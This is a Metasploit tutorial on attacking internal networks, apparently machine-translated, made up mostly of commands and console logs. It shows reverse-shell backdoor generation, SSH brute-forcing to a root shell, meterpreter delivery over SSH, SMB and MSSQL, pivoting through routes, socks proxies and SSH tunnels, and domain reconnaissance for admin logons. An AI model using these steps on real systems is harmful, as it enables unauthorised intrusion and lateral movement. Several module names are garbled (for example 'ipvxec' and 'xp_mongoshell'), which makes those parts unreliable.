Metasploit penetration test notes (intranet penetration)

Metasploit penetration test notes (intranet penetration)
0x01 reverse the shellFile

Generally, msfpayloadis used to generate a backdoor.exe file and upload it to the target machine for execution. You can obtain the meterpreter shell by using a local listener.

reverse_tcp/http/https => exe => victim => shell

Reverse_tcp

Windows:

msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X > shell.exe 

Linux (x86)

msfpayload linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -t elf -o shell 

Reverse_http

msfpayload windows/meterpreter/reverse_http LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X > shell.exe 

Reverse_https

msfpayload windows/meterpreter/reverse_https LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X > shell.exe 

Login privilege

Obtain the meterpreter shell method after obtaining some logon permissions.

SSH

Ssh_login

Module path: auxiliary/login/ssh/ssh_login

msf exploit(sshexec) > use auxiliary/scanner/ssh/ssh_loginmsf auxiliary(ssh_login) > show options Module options (auxiliary/scanner/ssh/ssh_login):   Name              Current Setting  Required  Description   ----              ---------------  --------  -----------   BLANK_PASSWORDS   true             no        Try blank passwords for all users   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database   DB_ALL_PASS       false            no        Add all passwords in the current database to the list   DB_ALL_USERS      false            no        Add all users in the current database to the list   PASSWORD                           no        A specific password to authenticate with   PASS_FILE                          no        File containing passwords, one per line   RHOSTS                             yes       The target address range or CIDR identifier   RPORT             22               yes       The target port   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host   THREADS           1                yes       The number of concurrent threads   USERNAME                           no        A specific username to authenticate as   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line   USER_AS_PASS      true             no        Try the username as the password for all users   USER_FILE                          no        File containing usernames, one per line   VERBOSE           true             yes       Whether to print output for all attemptsmsf auxiliary(ssh_login) > set RHOSTS 192.168.1.104RHOSTS => 192.168.1.104msf auxiliary(ssh_login) > set USERNAME rootUSERNAME => rootmsf auxiliary(ssh_login) > set PASSset PASSWORD   set PASS_FILE  msf auxiliary(ssh_login) > set PASSWORD toorPASSWORD => toormsf auxiliary(ssh_login) > exploit [*] 192.168.1.104:22 SSH - Starting bruteforce[*] 192.168.1.104:22 SSH - [1/3] - Trying: username: 'root' with password: ''[-] 192.168.1.104:22 SSH - [1/3] - Failed: 'root':''[*] 192.168.1.104:22 SSH - [2/3] - Trying: username: 'root' with password: 'root'[-] 192.168.1.104:22 SSH - [2/3] - Failed: 'root':'root'[*] 192.168.1.104:22 SSH - [3/3] - Trying: username: 'root' with password: 'toor'[*] Command shell session 4 opened (192.168.1.105:54562 -> 192.168.1.104:22) at 2014-08-07 22:55:54 +0800[+] 192.168.1.104:22 SSH - [3/3] - Success: 'root':'toor' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh Linux localhost.localdomain 2.6.18-164.el5 #1 SMP Thu Sep 3 03:33:56 EDT 2009 i686 i686 i386 GNU/Linux '[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completedmsf auxiliary(ssh_login) > sessions Active sessions===============  Id  Type         Information                       Connection  --  ----         -----------                       ----------  4   shell linux  SSH root:toor (192.168.1.104:22)  192.168.1.105:54562 -> 192.168.1.104:22 (192.168.1.104)msf auxiliary(ssh_login) >

 

Metasploit returns a linux shell if it detects a weak ssh password. Note that this is not the meterpreter shell. You can use

sessions –u id

Upgrade linux shell to meterpreter shell. The local test fails. :(

Sshexec

Module path: auxiliary/login/ssh/ssh_login

Note that this module does not exist in BT5 and kali.

msf> use exploit/multi/ssh/sshexec msf exploit(sshexec) > set payload linux/x86/meterpreter/reverse_tcp payload => linux/x86/meterpreter/reverse_tcpmsf exploit(sshexec) > set LHOST 192.168.1.105 LHOST => 192.168.1.105msf exploit(sshexec) > set LPORT 8080LPORT => 8080msf exploit(sshexec) > set RHOST 192.168.1.104RHOST => 192.168.1.104msf exploit(sshexec) > set PASSWORD toorPASSWORD => toormsf exploit(sshexec) > exploit [*] Started reverse handler on 192.168.1.105:8080 [*] 192.168.1.104:22 - Sending Bourne stager...[*] Command Stager progress -  40.39% done (288/713 bytes)[*] Transmitting intermediate stager for over-sized stage...(100 bytes)[*] Sending stage (1228800 bytes) to 192.168.1.104[*] Command Stager progress - 100.00% done (713/713 bytes)[*] Meterpreter session 3 opened (192.168.1.105:8080 -> 192.168.1.104:40813) at 2014-08-07 22:53:12 +0800meterpreter > 

Smb

Module path: exploit/windows/smb/ipvxec

If you use smb_login to scan windows for a weak password, you can use this method to obtain the shell. This is the most basic way to obtain windows shell in the Intranet. You need to set the Domain parameter when logging on to the Domain machine; otherwise, the logon error occurs.

As mentioned earlier, show advanced has advanced parameter settings for each module, in this example, you can set the EXE parameter in advanced to execute arbitrary local files (see [1]).

What if the target machine has soft or other simple protection measures? Then you can try to execute only the command

Export xec_command

Module path: auxiliary/admin/smb/export xec_command

 

 

Token cannot be used :(

Sqlserver

msf exploit(psexec) > use exploit/windows/mssql/mssql_payloadmsf exploit(mssql_payload) > show options Module options (exploit/windows/mssql/mssql_payload):   Name                 Current Setting  Required  Description   ----                 ---------------  --------  -----------   METHOD               cmd              yes       Which payload delivery method to use (ps, cmd, or old)   PASSWORD                              no        The password for the specified username   RHOST                                 yes       The target address   RPORT                1433             yes       The target port   USERNAME             sa               no        The username to authenticate as   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)Exploit target:   Id  Name   --  ----   0   Automaticmsf exploit(mssql_payload) >

After obtaining the login permission of SQL server, you can quickly obtain the meterpreter shell.

In this example, all three methods use xp_mongoshell. the first is powershell, the second is wscript.exe, and the third is debug.com. If there is no local environment, the demo will not be displayed.

Others

No matter what the scenario is, you only need to be able to convert to the file upload and execution permissions to get the shell. When obtaining a permission, you can certainly google to determine whether there are applicable scripts. If you do not analyze whether the permissions can be converted to file operations and execution permissions. If you can, you can get the shell. For example:

mysql and sqlserver ..etc => file/webshell =>shell

The msf plug-in tunna is also tested locally, and the php version is tested. The code is roughly like this

First generate a meterpreter.exe (the file name is not random ),

Then upload the file to c: \ windows \ temp \ meterpreter.exe.

Run the exec function in php. The LHOST parameter is incorrect when the meterpreter.exe code is generated during the test. After the rb code is changed, it is finally returned in the error.

0x02 conflict with metasploit

After obtaining certain permissions on the stepping stone, how can we make full use of the stepping stone function? This section briefly introduces several common methods.

Add route table

 

This is the most common method in metasploit. After adding the relationship between the route table and the session, you can use the module in msf to scan or attack across network segments. There are many methods. Here there is a script autoroute that can quickly add a route table (for example), you can also place the current session in the background (backgroud), and then add it using the route command.

 

Socks4a proxy

Here we use the auxiliary/server/socks4a module. Note that Proxychains does not support ICMP, so the-sT-Pn parameter must be used when the proxy uses NMAP. In addition, the Proxychains connection prompt is messy. When using the Proxychains agent of kali to use sqlmap, it looks really messy. You can use proxychains-ng here. Uninstall proxychains in kali, and then install proxychains-ng.

Root @ kali :~ # Git clone https://github.com/rofl0r/proxychains-ng.gitis cloning to 'proxychains-ng '... remote: Counting objects: 842, done. remote: Total 842 (delta 0), reused 0 (delta 0) Grouping ing objects: 100% (842/842), 465.92 KiB | 27 KiB/s, done. resolving deltas: 100% (554/554), done. root @ kali :~ # Cd proxychains-ng/root @ kali :~ /Proxychains-ng #./configure -- prefix =/usr -- sysconfdir =/etcDone, now run make & make installroot @ kali :~ /Proxychains-ng # make & make install

Then run the program with the proxychains4-q option, and there will be no messy output.

Ssh

Meta_ssh

When you have an ssh logon permission, you can use this plug-in to establish a link based on the ssh session (see [2]).

Then go to the shell, view the IP address of the NIC, and then exit and add the route table.

Scan the 5.5.5.0/24 segment, and then scan the 5.5.5.134 segment for weak passwords.

Results can be obtained.

Ssh/plink.exe

Another method of using SSH is to use plink rebound in windows, so that data packets are encrypted by SSH and can be detected by the firewall. The same is true in linux. First, generate a reverse backdoor that rebounded to the local device.

msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=5566 >  ~/Desktop/backdoor_reverse_localhost.exe 

 

 

Start monitoring later, and then upload plinkand backdoor.exe through webshell. Then execute

echo y | plink.exe -L 5566:192.168.6.131:6666 192.168.6.131 -l root -pw toor

After running backdoor.exe, meterpreter is established through ssh tunnel.

0x03 Intranet Scanning

Metasploit for Common Services (smb/ssh/mysql/mssql/oracle/ftp/tfp /... Etc) scan for version information (banner), logon verification, and so on.

For a simple process, refer to the previous note msf Intranet penetration note.

The specific scan script path is under/usr/share/metasploit-framework/modules/auxiliary/modules. You can find the path as needed.

Common scan ports: 109,110,111,123,135,137,138,139,143,161,264,265,389,443,445,500,631,901,995,124,

You can also use the rc Script (basic_discovery.rc ).

In addition, snmp is used to collect information on the Intranet. If a vswitch has a weak snmp password (group string), you can use snmp to collect route table information and VLAN Division information.

Generally, the network will comment on vlan Division, for example, Vlan100 is department x and Vlan200 is department y. The OID required by different brands and models of switches to obtain this information may be different (most of them are different), while snmp is on udp port 161, when ssh, telnet, web \ or the above services are not enabled on the switch and the port fails to be forwarded, you can rewrite the snmp_enumusers.rb script after you know the specific OID value.

0x04 domain penetration Problems

Several scanning scripts per AD are recommended (see [3], the same below)

Export xec_loggedin_users

This script can find the user logged on to each IP address in the current segment.

Local_admin_search_enum

 

 

You can find the IP address and User Name of the current logon management account.

Psexec_scanner

Execute batch xec to get the shell. The script has a function named batch xec, which is definitely a good example of rewriting. For details, refer to [4].

For more metasploit scripts for windows Domain penetration, refer to [5].

0x05 postscript

Metasploit is not required for Intranet and domain penetration, but more for cooperation with other tools. In addition, this process (see [6]) is significantly more important than understanding AD. Metasploit only provides a tunnel for automated discovery and utilization. If you simply understand ruby and metasploit code frameworks, both learning and penetration testing will be a powerful aid. In addition, the example above is only a reference for the reader to build a script in case of any situation.

0x06 references

[1] http://opexxx.tumblr.com/post/35763770674/btb-security-how-to-make-custom-exes-for-deployment

[2] https://github.com/dirtyfilthy/metassh

[3] http://www.pentestgeek.com/2012/11/03/find-local-admin-with-metasploit/

[4] http://www.darkoperator.com/blog/2011/12/16/psexec-scanner-auxiliary-module.html

[5] https://github.com/darkoperator/Meterpreter-Scripts/tree/master/post/windows/gather

[6] http://www.freebuf.com/articles/web/5901.html (and 8 floor Gall reply)